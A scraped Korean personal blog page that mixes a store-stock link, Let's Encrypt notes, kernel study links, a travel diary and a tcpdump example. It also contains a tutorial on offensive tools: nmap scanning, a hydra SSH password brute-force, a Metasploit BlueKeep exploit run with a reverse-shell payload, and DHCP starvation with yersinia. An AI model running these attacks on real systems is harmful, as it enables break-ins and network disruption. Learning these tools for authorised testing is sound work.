반응형

 


 

작성일: 2024년 4월 24일

 

 

롯데마트에 가기 전에 내가 구입할 제품이 해당 매장(점포)에 있는지 확인하고자 한다면,

아래 Web site를 이용할 것~

 

http://company.lottemart.com/mobiledowa/

 

 

롯데마트 매장별 상품 재고 조회

 

 

직접 롯데마트 매장에 가서 확인해봤는데, 아래 웹 사이트에서 조회한 재고 수량과 실제 매장의 재고 수량이 일치했었다.

 

 

롯데마트 매장별 상품 재고 조회


 

반응형

 

작성일: 2023년 8월 16일
참고 사항:
- Let’s Encrypt 는 SSL, TLS 무료로 인증서를 제공해주는 인증 기관이다.
- 인증서 유효기간이 90일이다.
- 따라서 90일이 지나기 전에 기존 인증서를 Renewal해주어야 한다.

 

자세한 발급 방법은 아래 Web Docs를 참고하기.


https://certbot.eff.org/

https://letsencrypt.org/ko/getting-started/

https://namu.wiki/w/Let's%20Encrypt

 

 

 

반응형

 


작성일:  2023년 8월 16일

 

nmap 명령

nmap 명령을 이용하여 특정 호스트에서 제공하는 서비스를 확인한다.

(즉, Listening하고 있는 TCP, UDP 포트를 스캔한다)

##
## 10.1.4.0 Network에 있는 Host의 IP address와 MAC address를 탐색하기
##

$ nmap -sn 10.1.4.0/24
Nmap scan report for 10.1.4.1
Host is up (0.0018s latency).
MAC Address: 1C:AF:AF:33:77:CF (JunOS Systems)
... 중간 생략 ...
Nmap scan report for 10.1.4.165
Host is up (0.0013s latency).
MAC Address: AB:A3:2E:34:36:31 (My Company)
Nmap scan report for kali.korea.kr (10.1.4.55)
Host is up.
Nmap done: 256 IP addresses (14 hosts up) scanned in 4.36 seconds



##
## 192.168.3.0 ~ 192.168.0.255 범위에 속하는 Network 장비의
## 서비스 포트를 스캔한다.
##

$ nmap -sV 192.168.3.0/24

Starting Nmap 7.80 ( https://nmap.org ) at 2023-08-15 16:59 KST

... 중간 생략 ...

Nmap scan report for my-host.andrew.bastion (192.168.3.11)
Host is up (0.00049s latency).
Not shown: 993 closed ports
PORT     STATE    SERVICE       VERSION
22/tcp   open     ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp  open     rpcbind       2-4 (RPC #100000)
139/tcp  open     netbios-ssn   Samba smbd 4.6.2
445/tcp  open     netbios-ssn   Samba smbd 4.6.2
2049/tcp open     nfs_acl       3 (RPC #100227)
3389/tcp filtered ms-wbt-server
5000/tcp open     http          Docker Registry (API: 2.0)
MAC Address: 18:C0:4D:8A:DB:29 (Giga-byte Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

... 중간 생략 ...

Nmap scan report for 192.168.3.130
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.5-10.11.4-MariaDB-log
MAC Address: 00:07:32:4A:78:1E (Aaeon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

... 중간 생략 ...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (11 hosts up) scanned in 419.38 seconds

$ 



##
## 10.1.4.8 host의 상세한 정보를 위한 스캔 방법
## (참고: -A 옵션은 -O -sV --script=default --traceroute 옵션과 동일하다)
##

$ nmap -A 10.1.4.8

 

hydra 명령

위 nmap 명령을 수행하여 얻은 네트워크 서비스 정보(IP Address, TCP/UDP Port)를 확인하고,

hydra 명령을 이용하여 ssh 서비스에 접근해본다. (ssh, ftp, mysql, nfs, http 등 모든 서비스에 대해서 테스트할 수 있다)

$ cat passwd.tx

mytestpw
mypasswd
thetest
junkpass
...
...

$

##
## ssh 로그인 테스트
##

$ hydra -l mytestid -P passwd.txt -v -V -f 192.168.3.11 ssh

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-15 17:07:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://192.168.3.11:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://mytestid@192.168.3.11:22
[INFO] Successful, password authentication is supported by ssh://192.168.3.11:22
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "mytestpw" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "mypasswd" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "thetest" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target 192.168.3.11 - login "mytestid" - pass "junkpass" - 4 of 4 [child 3] (0/0)
[22][ssh] host: 192.168.3.11   login: mytestid   password: thetest
[STATUS] attack finished for 192.168.3.11 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-15 17:07:16


##
## mysql 로그인 테스트
##

$ hydra -l mytestid -P passwd.txt -v -V -f 192.168.3.11 mysql

...
...

 

 

msfdb, msfconsole 명령

Metasploit 해킹 테스트 도구를 이용하여 인터넷 서비스(예: Samba)의 취약점을 확인하고, 해당 취약점을 해킹 경로로 삼을 수 있다.

긴 설명보다는 아래의 예제를 보는 것이 이해하기 좋을 듯~

$ sudo -s

$ msfdb init

[?] Would you like to init the webservice? (Not Required) [no]:
Clearing http web data service credentials in msfconsole
Running the 'init' command for the database:
Existing database running



$ msfdb start

[?] Would you like to start the webservice? (Not Required) [no]:
Clearing http web data service credentials in msfconsole
Running the 'start' command for the database:
Database already started at /home/myuser/snap/metasploit-framework/common/.msf4/db



$ msfdb status

====================================================================
Running the 'status' command for the database:
Database started
====================================================================

====================================================================
Running the 'status' command for the webservice:
MSF web service is running as PID 81810
====================================================================



$ msfconsole
...
... 중간 생략 ...
...
Metasploit Documentation: https://docs.metasploit.com/

##
## 참고 설명:
##   - 옵션은 "모든 취약점을 리스팅"하라는 뜻
##   -s  disclosure_date 옵션은 "해당 취약점 공개 날짜 순서로 정렬"하라는 뜻
##

msf6 > search - -s disclosure_date
...
... 중간 생략 ...
...
   5221  exploit/linux/http/pyload_js2py_exec                                               2023-01-13       excellent  Yes    pyLoad js2py Python Execution
   5222  exploit/linux/http/froxlor_log_path_rce                                            2023-01-29       excellent  Yes    Froxlor Log Path RCE
   5223  auxiliary/scanner/http/joomla_api_improper_access_checks                           2023-02-01       normal     Yes    Joomla API Improper Access Checks
   5224  exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669                             2023-02-01       excellent  No     Fortra GoAnywhere MFT Unsafe Deserialization RCE
   5225  exploit/multi/http/lucee_scheduled_job                                             2023-02-10       excellent  No     Lucee Authenticated Scheduled Job Code Execution
   5226  exploit/linux/http/fortinac_keyupload_file_write                                   2023-02-16       excellent  Yes    Fortinet FortiNAC keyUpload.jsp arbitrary file write
   5227  exploit/unix/webapp/spip_rce_form                                                  2023-02-27       excellent  Yes    SPIP form PHP Injection
   5228  exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360                             2023-03-14       excellent  Yes    Adobe ColdFusion Unauthenticated Remote Code Execution
   5229  exploit/linux/misc/unidata_udadmin_auth_bypass                                     2023-03-30       excellent  Yes    Rocket Software Unidata udadmin_server Authentication Bypass
   5230  exploit/linux/misc/unidata_udadmin_password_stack_overflow                         2023-03-30       good       Yes    Rocket Software Unidata udadmin_server Stack Buffer Overflow in Password
   5231  exploit/multi/http/pentaho_business_server_authbypass_and_ssti                     2023-04-04       excellent  Yes    Pentaho Business Server Auth Bypass and Server Side Template Injection RCE
   5232  exploit/aix/local/invscout_rpm_priv_esc                                            2023-04-24       excellent  Yes    invscout RPM Privilege Escalation
   5233  exploit/windows/http/ivanti_avalanche_filestoreconfig_upload                       2023-04-24       excellent  Yes    Ivanti Avalanche FileStoreConfig File Upload

##
## 만약, Windows RDP(Remote Desktop Protocol)에 관련한 취약점을 검색하고 싶다면
## 아래 명령처럼 수행하면 된다.
##

msf6 > search -s disclosure_date  "RDP Remote Windows"

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
   1   auxiliary/scanner/rdp/rdp_scanner                                      normal  No     Identify endpoints speaking the Remote Desktop Protocol (RDP)
   2   post/windows/gather/credentials/mremote                                normal  No     Windows Gather mRemote Saved Password Extraction
   3   post/windows/manage/enable_rdp                                         normal  No     Windows Manage Enable Remote Desktop
   4   exploit/windows/fileformat/cain_abel_4918_rdp         2008-11-30       good    No     Cain and Abel RDP Buffer Overflow
   5   exploit/windows/fileformat/adobe_flashplayer_button   2010-10-28       normal  No     Adobe Flash Player "Button" Remote Code Execution
   6   exploit/windows/fileformat/wireshark_packet_dect      2011-04-18       good    No     Wireshark packet-dect.c Stack Buffer Overflow (local)
   7   auxiliary/dos/windows/rdp/ms12_020_maxchannelids      2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   8   exploit/windows/http/sws_connection_bof               2012-07-20       normal  Yes    Simple Web Server Connection Header Buffer Overflow
   9   exploit/multi/script/web_delivery                     2013-07-19       manual  No     Script Web Delivery
   10  exploit/multi/vnc/vnc_keyboard_exec                   2015-07-10       great   No     VNC Keyboard Remote Code Execution
   11  exploit/windows/rdp/rdp_doublepulsar_rce              2017-04-14       great   Yes    RDP DOUBLEPULSAR Remote Code Execution
   12  exploit/windows/rdp/cve_2019_0708_bluekeep_rce        2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free


Interact with a module by name or index. For example info 12, use 12 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

msf6 > 

msf6 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 10.1.4.50
rhosts => 10.1.4.50

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 10.1.4.51:4444
[*] 10.1.4.50:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.1.4.50:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[*] 10.1.4.50:3389        - Scanned 1 of 1 hosts (100% complete)
[-] 10.1.4.50:3389 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The target service is not running or refused our connection. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exit

$

 

터미널에서 CLI를 수행하는 것치고는 출력물이 예쁘게 나온다. (아래 화면 캡처를 참고)

 

 

yersinia 해킹 도구를 이용하여 DHCP 자원을 고갈시키기

$ sudo -s

$ apt install yersinia

##
## Graphic User Interface Mode로 실행
##

$ yersinia -G

위 명령을 실행하면, 아래와 같이 Yersinia GUI를 볼 수 있다.

기본으로 모든 Protocol이 선택되어 있는데, 다 해제하고 DHCP만 선택하여 테스트한다.

Yersinia GUI 화면

 

반응형

"커널연구회"의 자료를 참고!

 

 

https://www.kernel.bz/blogPost/kernel-mov-list

 

커널 소스 분석 문서 및 동영상 강의 목록

 

kernel.bz

 

 

http://www.iamroot.org/

 

iamroot.org - IT 스터디

kernel, xen, kvm, gcc, ai 스터디 그룹

www.iamroot.org

 

 

http://www.iamroot.org/xe/index.php?mid=Study&document_srl=215076 

 

커널 스터디를 위한 문c 가이드입니다. - 스터디 - iamroot.org

안녕하세요? 문c 블로그(http://jake.dothome.co.kr)의 문영일입니다.   한 달 후면 여러분들이 1년간 기다리셨던 18차 커널 스터디가 시작됩니다. 커널 스터디를 통한 과실은 이미 많은 분들이 들어보

www.iamroot.org

 

 

http://jake.dothome.co.kr/

 

문c 블로그

최신 ARM 리눅스 5.x 커널 분석

jake.dothome.co.kr

 

 

 


 


https://hyeyoo.com/80

 

[kernel/locking] spinlock (1) - spinlock 사용법

앞선 글에서 lock이란 무엇이고, lock의 필요성에 대해서 알아보았다. 이번 글에서는 가장 기본적인 spinlock을 리눅스 커널에서 어떻게 구현했는지 알아볼 것이다. 우선 관련된 개념을 몇 가지 살펴

hyeyoo.com

 

 

https://pr0gr4m.github.io/

 

Linux Kernel Analysis

Linux Kernel Blog

pr0gr4m.github.io

 

반응형

 

 

 

참고 문서:
  "문c 블로그 - RCU(Read Copy Update)"
  http://jake.dothome.co.kr/rcu/

 

 

참고 문서: 
  "리눅스 커널 RCU 이해 / 커널연구회"
  https://kernel.bz/boardPost/118679/20

 

반응형

 

작성일: 2023년 8월 1일

 

NAVER D2 자료 - TCP/IP Network Stack 이해하기

https://d2.naver.com/helloworld/47667

 

 

 

 

 

 

 

반응형
여행 일정: 2023년 7월 27일(목) ~ 7월 29일(토)

 

전체 일정 요약

서울 -> 원주 소금산 출렁다리 -> 인제군 기린면 현리(숙박) -> 목포순대(식당, 순대국) -> 곰배령 -> 산골나들이(식당, 산채비빔밥) -> 방동약수터 -> 인제군 기린면 현리(숙박) -> 목포순대(식당, 소머리국밥) -> 자작나무숲 -> 홍천(카페,테샤로바) -> 홍천성당

 

 

원주 소금산 출렁다리, 울렁다리

7월 말의 덥고 습한 날씨만 아니라면, 모든 것이 좋았던 여행지이다.

깍아지른 절벽 옆을 걷는 데크길, 출렁다리와 울렁다리에서 보는 경치가 시원하다.

 

 

인제군 기린면 현리

기린면 현리는 곰배령과 자작나무 숲을 가기에 좋은 위치이고

숙박, 목욕탕 때문에 기린면 현리에 갔다.

 

'기린면 현리'에서 갔던 편의 시설 중에서 만족했던 것들을 열거해보면,

- 목포순대

   아침식사가 가능했다.

   아침 7시 30분쯤 갔었는데 바로 식사할 수 있었다.

   오전에 곰배령이나 자작나무숲에 갈 때 이곳에서 식사하면 여유롭게 여행할 수 있다.

   맛도 적당하게 괜찮았다. 음식 가격은 서울에 비하면 20% 정도 낮은 정도.

   나중에 가족들과 다시 방문할 의사가 있다.

- 기린목욕탕

   3천원이라는 가격에서 한번 놀랐다.

   남자 목욕탕은 수건, 비누가 제공되고

   여자 목욕탕은 수건만 제공된다.

   나는 곰배령에서 땀을 많이 흘려서 곰배령에서 내려오자마다 이 기린목욕탕부터 들렀다.

   땀을 많이 흘린뒤에 목욕탕은 행복을 준다. ^^

- 커피홀(Coffee Hole)

   아침 일찍부터 오픈해서 모닝 커피 한잔 마시러 갔었다.

   1층에서 주문하고 2층에 있는 테이블에서 마시는 공간 구조이다.

   젊은 사장님 부부가 친절하고, 커피맛이 딱 내가 원하는 맛이라서 만족했다.

   (참고로 기린면 현리에서는 어느 편의시설을 가든 사장님의 나이가 많은 편인데, 이 카페는 젊은 부부가 운영했다)

   아침에 카페를 방문했을 때, 샌드위치를 많이 만들고 있었는데 단체 주문을 받는 듯 했다. 

   샌드위치가 너무 실하게 만들어져서 하나 사고 싶었지만, 주문이 밀려 있는 모습에 하나 더 만들어 달라고 하기가 어려웠다.

   다음에 인제군에 또 오면 재방문할 의사가 있을 정도의 카페 ^^

- 공영주차장

   주변 상점 개수에 비하면, 공영 주차장이 꽤 넉넉하다.

   그리고 위 지도에 표시된 공영 주차장 말고, 벽화마을 골목 군데군데, 그리고 기린성당 주변에도 작은 공영주차장이 몇개 더 있어서

   주차 때문에 스트레스 받을 일이 없다.

 

 

 

곰배령 (점봉산 산림생태탐방로)

곰배령에 딱 도착했을 때 "와~ " 소리가 나올 정도로 좋았다.

곰배령(목적지) 도착하기 1분 전에 시원하게 탁 트인 시야와 신선한 공기가 복합적으로 사람의 기분을 좋게 했다.

그리고 7월 말에 탐방로는 습하고 더운데, 곰배령 정상은 공기가 차갑고 건조했다.

눈으로 느끼는 햇살은 영상 35도 정도인데, 피부로 느끼는 온도는 20~25도 정도. 

즉, 곰배령 정상은 7월 말에 가도 시원함과 살짝 따뜻함이 공존하는 공간이다.

오르는 2시간만 습기와 더운 날씨를 잘 버티면 된다.

곰배령에서 내려와서 주차장에서 5분만 자동차로 달리면, '산골나들이' 식당이 나오는데 이곳이 딱 내 감성과 맞았다.

만약, "빨리 빨리~" 그리고 "조미료 맛"을 좋아하는 사람은 가지 않는 것이 좋다.

사장님의 나이가 있는만큼 요리가 완성되기까지 유럽의 레스또랑처럼 느긋하게 기다려야 하고,

완전 자연의 음식처럼 느껴지기 때문에 도시 음식에 길들여진 사람은 이 식당의 음식을 싫어할 수 있다.

나는 유년 시절을 깡촌에서 보내서 그런지 이 식당 음식이 너무 마음에 들었다.

지금 막 텃밭에서 식재료를 가져와서 간장, 고추장만 살짝 버무린 듯한 날것의 음식... 

이래서 마음에 들었다.

 

 

원대리 자작나무숲 (속삭이는 자작나무숲)

여름(7월 말)이라서 오르는 길이 덮고 습했는데, 이것만 제외하면 딱 좋은 여행지이다.

주차료 5천원은 바로 5천원짜리 지역화폐(상품권)으로 되돌려 받고, 이 상품권으로 주차장 옆에 있는 상점에서

먹거리를 사먹을 수 있다.

사실상 입장료가 무료이다.

정상에서 듣는 숲 해설사의 설명도 재미있었다.

겨울에는 또 다른 모습이라고 하니까, 이번 겨울에 한번 더 올 생각이다.

 

 

 홍천(홍천성당, 테샤로바 카페)

인제에서 서울로 돌아오는 길에 밥을 먹기 위해 '테샤로바' 카페에 들렀다.

샌드위치, 음료 모두 맛있고 카페 분위기도 좋았다.

그리고 카페에서 100미터 옆에 있는 홍천성당에 갔다.

100년이 넘는 오랜 역사가 있는 성당이고 국가등록문화재이다.

성당이 시내 가운데 높은 지대에 있어서 성당에서 내려다보는 도시 풍경도 좋았다.

 

 

차박 정보

인제군 기린면에서 차박을 고려한다면, 아래 지도에 표시된 기린생활체육공원 주차장이 추천할만한다.

밤 10시가 넘으면, 주민들이 더 이상 운동하러 오지 않아서 조용하고 

체육공원에 화장실과 수도시설이 잘 되어 있다.

단, 새벽 6시에 게이트볼 하시는 분들이 10명 정도 오시는데, "딱~ 딱~" 공치는 소리와 동호인들 간 대화가 크게 들린다.

워낙 주변이 조용해서 특히 크게들리는 듯 하다.

반응형

아래 명령 예시처럼 수행하면, tcp syn과 reset 패킷을 확인할 수 있다.

 

$ tcpdump -i enp1s0 -nN "tcp[tcpflags] == tcp-syn or tcp[tcpflags] == tcp-rst"

16:55:16.516453 IP 65.49.1.10.42458 > 112.169.87.89.87: Flags [S], seq 3730493766, win 65535, length 0
16:55:19.755480 IP 140.99.191.218.57246 > 112.169.89.88.26720: Flags [S], seq 417367123, win 1024, length 0
16:55:19.960898 IP 140.99.191.218.57246 > 112.169.89.88.26720: Flags [R], seq 417367124, win 1200, length 0
16:55:19.991267 IP 185.11.61.225.44794 > 112.169.89.88.38956: Flags [S], seq 163297978, win 1024, length 0
16:55:20.146215 IP 185.11.61.225.44794 > 112.169.89.88.38956: Flags [R], seq 163297979, win 1200, length 0
16:55:38.865833 IP 140.99.191.218.57246 > 112.169.89.88.19331: Flags [S], seq 523253283, win 1024, length 0

 

+ Recent posts